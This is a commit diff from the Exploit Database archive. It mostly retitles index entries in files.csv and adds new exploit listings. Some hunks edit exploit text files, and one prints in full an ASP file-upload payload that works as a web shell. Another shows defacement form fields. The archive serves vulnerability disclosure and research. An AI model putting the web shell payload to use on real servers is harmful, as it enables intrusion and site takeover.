DB: 2016-03-17

5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00 · 2016-03-17 07:07:56 +00:00 · 477bcbdcc0
commit 477bcbdcc0
parent 48534c54b0
7877 changed files with 590387 additions and 589604 deletions
--- a/files.csv
+++ b/files.csv
@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port
 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0
 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0
 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
-3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0
+3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0
 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
 3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0
 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0
@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port
 10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0
 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0
 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
-10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80
+10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0
 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port
 11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0
 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0
 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
-11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0
+11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port
 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
 11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
-11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0
+11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
 11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0
 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0
 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0
@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port
 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
-12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0
+12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0
 12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
 12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port
 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0
 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0
 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
-12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0
+12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0
 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0
 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0
@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port
 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0
 12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
-12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0
+12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0
 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0
 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port
 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0
 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
-12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
+12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
 12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
 12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0
 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0
@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port
 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0
 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
-14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
+14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
 12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port
 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0
 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0
 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0
-12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0
+12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
 12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0
 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port
 14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0
 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0
-14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0
+14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0
 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0
 14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0
 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0
@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port
 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0
 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
-14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
+14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0
 14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
 14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0
@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port
 17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0
 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0
 17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
-17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0
+17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0
 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0
 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0
 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0
@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port
 24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0
 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0
 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
-24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
+24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0
 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port
 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
-30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0
+30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0
 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
 30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port
 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
 34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
-34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
+34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port
 35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
 35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
 35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
-35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0
+35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port
 39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
 39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
 39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
 39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
 39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
--- a/platforms/asp/webapps/1931.txt
+++ b/platforms/asp/webapps/1931.txt
@ -40,7 +40,7 @@ This can be exploited to inject  arbitrary ASP code.
 Exploit :
-#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if	%><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></TEXTAREA></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
+#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if	%><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%>&lt;/textarea&gt;</TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
 [m.r.roohian]
 attacker can upload  "cmd.asp" with this uploader and ...
--- a/platforms/asp/webapps/4848.txt
+++ b/platforms/asp/webapps/4848.txt
@ -50,7 +50,7 @@ create a topic:
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ForumID:<input type=text name=ForumId value=><br>
 Subject:<input type=text name=Subject value="r3dm0v3."><br>
- Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.</textarea><br>
+ Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.&lt;/textarea&gt;<br>
 Icon:<input type=text name=Icon value=14><br>
 Show Signature:<input type=text name=Showsignature value=0><br>
 Notify:<input type=text name=Notify ><br>
@ -89,8 +89,8 @@ Add content:
 Date:<input type=text name=DateAdded value="6/1/2008"><br>
 Author:<input type=text name=Author value=r3dm0v3><br>
 title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
- ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br>
+ ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.&lt;/textarea&gt;<br>
- LongDesc:<br><textarea rows=4 cols=50  name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br>
+ LongDesc:<br><textarea rows=4 cols=50  name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir&lt;/textarea&gt;<br>
 relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br>
 DownloadURL:<input type=text name=DownloadURL><br>
 Filename:<input type=text name=Filename><br>
--- a/platforms/asp/webapps/5556.txt
+++ b/platforms/asp/webapps/5556.txt
@ -1,4 +1,3 @@
 |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
 |     _                   __           __       __          ______     |
 |   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
--- a/platforms/asp/webapps/7872.txt
+++ b/platforms/asp/webapps/7872.txt
@ -1,4 +1,3 @@
                          ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
